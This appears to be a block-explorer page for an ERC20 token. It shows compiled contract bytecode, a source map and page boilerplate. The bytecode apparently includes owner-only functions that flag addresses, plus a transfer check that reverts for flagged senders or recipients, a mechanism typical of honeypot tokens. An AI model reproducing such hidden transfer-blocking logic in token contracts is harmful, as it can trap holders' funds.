60a01b03821661082e5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610502565b6108398383836109c8565b6001600160a01b038316600090815260016020526040902054818110156108b15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610502565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109119086815260200190565b60405180910390a3610762565b6000546001600160a01b0316331461040d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610502565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b03821660009081526002602052604090205460ff1680610a0757506001600160a01b03831660009081526002602052604090205460ff165b156103f65760075460ff1615156001146103f65760405162461bcd60e51b81526020600482015260006024820152604401610502565b600060208083528351808285015260005b81811015610a6a57858101830151858201604001528201610a4e565b81811115610a7c576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610aa957600080fd5b919050565b60008060408385031215610ac157600080fd5b610aca83610a92565b946020939093013593505050565b600080600060608486031215610aed57600080fd5b610af684610a92565b9250610b0460208501610a92565b9150604084013590509250925092565b600060208284031215610b2657600080fd5b610b2f82610a92565b9392505050565b60008060208385031215610b4957600080fd5b823567ffffffffffffffff80821115610b6157600080fd5b818501915085601f830112610b7557600080fd5b813581811115610b8457600080fd5b8660208260051b8501011115610b9957600080fd5b60209290920196919550909350505050565b60008060408385031215610bbe57600080fd5b610bc783610a92565b9150610bd560208401610a92565b90509250929050565b600181811c90821680610bf257607f821691505b60208210811415610c1357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60008219821115610c4257610c42610c19565b500190565b634e487b7160e01b600052603260045260246000fd5b6000600019821415610c7157610c71610c19565b506001019056fea2646970667358221220a40cc14d0886740707511b032696f8c733b17688ae2d9bcabc70401292e9830764736f6c634300080c0033

Deployed Bytecode Sourcemap

20522:136:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11610:201;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;11610:201:0;1053:187:1;10379:108:0;10467:12;;10379:108;;;1391:25:1;;;1379:2;1364:18;10379:108:0;1245:177:1;12391:295:0;;;;;;:::i;:::-;;:::i;9692:93::-;;;9775:2;1902:36:1;;1890:2;1875:18;9692:93:0;1760:184:1;13095:238:0;;;;;;:::i;:::-;;:::i;10206:108::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10286:20:0;10262:4;10286:20;;;:8;:20;;;;;;;;;10206:108;9998:200;;;;;;:::i;:::-;;:::i;:::-;;10550:127;;;;;;:::i;:::-;-1:-1:-1;;;;;10651:18:0;10624:7;10651:18;;;:9;:18;;;;;;;10550:127;5843:103;;;:::i;9793:197::-;;;;;;:::i;:::-;;:::i;5202:87::-;5248:7;5275:6;5202:87;;-1:-1:-1;;;;;5275:6:0;;;2906:51:1;;2894:2;2879:18;5202:87:0;2760:203:1;8949:104:0;;;:::i;13836:436::-;;;;;;:::i;:::-;;:::i;10883:193::-;;;;;;:::i;:::-;;:::i;11139:151::-;;;;;;:::i;:::-;;:::i;6101:201::-;;;;;;:::i;:::-;;:::i;8730:100::-;8784:13;8817:5;8810:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;:::o;11610:201::-;11693:4;3991:10;11749:32;3991:10;11765:7;11774:6;11749:8;:32::i;:::-;-1:-1:-1;11799:4:0;;11610:201;-1:-1:-1;;;11610:201:0:o;12391:295::-;12522:4;3991:10;12580:38;12596:4;3991:10;12611:6;12580:15;:38::i;:::-;12629:27;12639:4;12645:2;12649:6;12629:9;:27::i;:::-;-1:-1:-1;12674:4:0;;12391:295;-1:-1:-1;;;;12391:295:0:o;13095:238::-;13183:4;3991:10;13239:64;3991:10;13255:7;13292:10;13264:25;3991:10;13255:7;13264:9;:25::i;:::-;:38;;;;:::i;:::-;13239:8;:64::i;9998:200::-;5088:13;:11;:13::i;:::-;10088:9:::1;10083:108;10103:22:::0;;::::1;10083:108;;;10174:5;10147:8;:24;10156:11;;10168:1;10156:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;10147:24:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;10147:24:0;:32;;-1:-1:-1;;10147:32:0::1;::::0;::::1;;::::0;;;::::1;::::0;;10127:3;::::1;::::0;::::1;:::i;:::-;;;;10083:108;;;;9998:200:::0;;:::o;5843:103::-;5088:13;:11;:13::i;:::-;5908:30:::1;5935:1;5908:18;:30::i;:::-;5843:103::o:0;9793:197::-;5088:13;:11;:13::i;:::-;9881:9:::1;9876:107;9896:22:::0;;::::1;9876:107;;;9967:4;9940:8;:24;9949:11;;9961:1;9949:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;9940:24:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;9940:24:0;:31;;-1:-1:-1;;9940:31:0::1;::::0;::::1;;::::0;;;::::1;::::0;;9920:3;::::1;::::0;::::1;:::i;:::-;;;;9876:107;;8949:104:::0;9005:13;9038:7;9031:14;;;;;:::i;13836:436::-;13929:4;3991:10;13929:4;14012:25;3991:10;14029:7;14012:9;:25::i;:::-;13985:52;;14076:15;14056:16;:35;;14048:85;;;;-1:-1:-1;;;14048:85:0;;4357:2:1;14048:85:0;;;4339:21:1;4396:2;4376:18;;;4369:30;4435:34;4415:18;;;4408:62;-1:-1:-1;;;4486:18:1;;;4479:35;4531:19;;14048:85:0;;;;;;;;;14169:60;14178:5;14185:7;14213:15;14194:16;:34;14169:8;:60::i;10883:193::-;10962:4;3991:10;11018:28;3991:10;11035:2;11039:6;11018:9;:28::i;11139:151::-;-1:-1:-1;;;;;11255:18:0;;;11228:7;11255:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11139:151::o;6101:201::-;5088:13;:11;:13::i;:::-;-1:-1:-1;;;;;6190:22:0;::::1;6182:73;;;::::0;-1:-1:-1;;;6182:73:0;;4763:2:1;6182:73:0::1;::::0;::::1;4745:21:1::0;4802:2;4782:18;;;4775:30;4841:34;4821:18;;;4814:62;-1:-1:-1;;;4892:18:1;;;4885:36;4938:19;;6182:73:0::1;4561:402:1::0;6182:73:0::1;6266:28;6285:8;6266:18;:28::i;:::-;6101:201:::0;:::o;17863:380::-;-1:-1:-1;;;;;17999:19:0;;17991:68;;;;-1:-1:-1;;;17991:68:0;;5170:2:1;17991:68:0;;;5152:21:1;5209:2;5189:18;;;5182:30;5248:34;5228:18;;;5221:62;-1:-1:-1;;;5299:18:1;;;5292:34;5343:19;;17991:68:0;4968:400:1;17991:68:0;-1:-1:-1;;;;;18078:21:0;;18070:68;;;;-1:-1:-1;;;18070:68:0;;5575:2:1;18070:68:0;;;5557:21:1;5614:2;5594:18;;;5587:30;5653:34;5633:18;;;5626:62;-1:-1:-1;;;5704:18:1;;;5697:32;5746:19;;18070:68:0;5373:398:1;18070:68:0;-1:-1:-1;;;;;18151:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18203:32;;1391:25:1;;;18203:32:0;;1364:18:1;18203:32:0;;;;;;;17863:380;;;:::o;18534:453::-;18669:24;18696:25;18706:5;18713:7;18696:9;:25::i;:::-;18669:52;;-1:-1:-1;;18736:16:0;:37;18732:248;;18818:6;18798:16;:26;;18790:68;;;;-1:-1:-1;;;18790:68:0;;5978:2:1;18790:68:0;;;5960:21:1;6017:2;5997:18;;;5990:30;6056:31;6036:18;;;6029:59;6105:18;;18790:68:0;5776:353:1;18790:68:0;18902:51;18911:5;18918:7;18946:6;18927:16;:25;18902:8;:51::i;:::-;18658:329;18534:453;;;:::o;14742:840::-;-1:-1:-1;;;;;14873:18:0;;14865:68;;;;-1:-1:-1;;;14865:68:0;;6336:2:1;14865:68:0;;;6318:21:1;6375:2;6355:18;;;6348:30;6414:34;6394:18;;;6387:62;-1:-1:-1;;;6465:18:1;;;6458:35;6510:19;;14865:68:0;6134:401:1;14865:68:0;-1:-1:-1;;;;;14952:16:0;;14944:64;;;;-1:-1:-1;;;14944:64:0;;6742:2:1;14944:64:0;;;6724:21:1;6781:2;6761:18;;;6754:30;6820:34;6800:18;;;6793:62;-1:-1:-1;;;6871:18:1;;;6864:33;6914:19;;14944:64:0;6540:399:1;14944:64:0;15021:38;15042:4;15048:2;15052:6;15021:20;:38::i;:::-;-1:-1:-1;;;;;15094:15:0;;15072:19;15094:15;;;:9;:15;;;;;;15128:21;;;;15120:72;;;;-1:-1:-1;;;15120:72:0;;7146:2:1;15120:72:0;;;7128:21:1;7185:2;7165:18;;;7158:30;7224:34;7204:18;;;7197:62;-1:-1:-1;;;7275:18:1;;;7268:36;7321:19;;15120:72:0;6944:402:1;15120:72:0;-1:-1:-1;;;;;15228:15:0;;;;;;;:9;:15;;;;;;15246:20;;;15228:38;;15446:13;;;;;;;;;;:23;;;;;;15498:26;;;;;;15260:6;1391:25:1;;1379:2;1364:18;;1245:177;15498:26:0;;;;;;;;15537:37;9998:200;5367:132;5248:7;5275:6;-1:-1:-1;;;;;5275:6:0;3991:10;5431:23;5423:68;;;;-1:-1:-1;;;5423:68:0;;7553:2:1;5423:68:0;;;7535:21:1;;;7572:18;;;7565:30;7631:34;7611:18;;;7604:62;7683:18;;5423:68:0;7351:356:1;6462:191:0;6536:16;6555:6;;-1:-1:-1;;;;;6572:17:0;;;-1:-1:-1;;;;;;6572:17:0;;;;;;6605:40;;6555:6;;;;;;;6605:40;;6536:16;6605:40;6525:128;6462:191;:::o;19587:200::-;-1:-1:-1;;;;;19717:12:0;;;;;;:8;:12;;;;;;;;;:30;;-1:-1:-1;;;;;;19733:14:0;;;;;;:8;:14;;;;;;;;19717:30;19713:72;;;19757:15;;;;:23;;:15;:23;19749:36;;;;-1:-1:-1;;;19749:36:0;;7914:2:1;19749:36:0;;;7896:21:1;-1:-1:-1;7933:18:1;;;7926:29;7972:18;;19749:36:0;7712:284:1;14:597;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:328::-;1504:6;1512;1520;1573:2;1561:9;1552:7;1548:23;1544:32;1541:52;;;1589:1;1586;1579:12;1541:52;1612:29;1631:9;1612:29;:::i;:::-;1602:39;;1660:38;1694:2;1683:9;1679:18;1660:38;:::i;:::-;1650:48;;1745:2;1734:9;1730:18;1717:32;1707:42;;1427:328;;;;;:::o;1949:186::-;2008:6;2061:2;2049:9;2040:7;2036:23;2032:32;2029:52;;;2077:1;2074;2067:12;2029:52;2100:29;2119:9;2100:29;:::i;:::-;2090:39;1949:186;-1:-1:-1;;;1949:186:1:o;2140:615::-;2226:6;2234;2287:2;2275:9;2266:7;2262:23;2258:32;2255:52;;;2303:1;2300;2293:12;2255:52;2343:9;2330:23;2372:18;2413:2;2405:6;2402:14;2399:34;;;2429:1;2426;2419:12;2399:34;2467:6;2456:9;2452:22;2442:32;;2512:7;2505:4;2501:2;2497:13;2493:27;2483:55;;2534:1;2531;2524:12;2483:55;2574:2;2561:16;2600:2;2592:6;2589:14;2586:34;;;2616:1;2613;2606:12;2586:34;2669:7;2664:2;2654:6;2651:1;2647:14;2643:2;2639:23;2635:32;2632:45;2629:65;;;2690:1;2687;2680:12;2629:65;2721:2;2713:11;;;;;2743:6;;-1:-1:-1;2140:615:1;;-1:-1:-1;;;;2140:615:1:o;2968:260::-;3036:6;3044;3097:2;3085:9;3076:7;3072:23;3068:32;3065:52;;;3113:1;3110;3103:12;3065:52;3136:29;3155:9;3136:29;:::i;:::-;3126:39;;3184:38;3218:2;3207:9;3203:18;3184:38;:::i;:::-;3174:48;;2968:260;;;;;:::o;3233:380::-;3312:1;3308:12;;;;3355;;;3376:61;;3430:4;3422:6;3418:17;3408:27;;3376:61;3483:2;3475:6;3472:14;3452:18;3449:38;3446:161;;;3529:10;3524:3;3520:20;3517:1;3510:31;3564:4;3561:1;3554:15;3592:4;3589:1;3582:15;3446:161;;3233:380;;;:::o;3618:127::-;3679:10;3674:3;3670:20;3667:1;3660:31;3710:4;3707:1;3700:15;3734:4;3731:1;3724:15;3750:128;3790:3;3821:1;3817:6;3814:1;3811:13;3808:39;;;3827:18;;:::i;:::-;-1:-1:-1;3863:9:1;;3750:128::o;3883:127::-;3944:10;3939:3;3935:20;3932:1;3925:31;3975:4;3972:1;3965:15;3999:4;3996:1;3989:15;4015:135;4054:3;-1:-1:-1;;4075:17:1;;4072:43;;;4095:18;;:::i;:::-;-1:-1:-1;4142:1:1;4131:13;;4015:135::o

Swarm Source

ipfs://a40cc14d0886740707511b032696f8c733b17688ae2d9bcabc70401292e98307
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.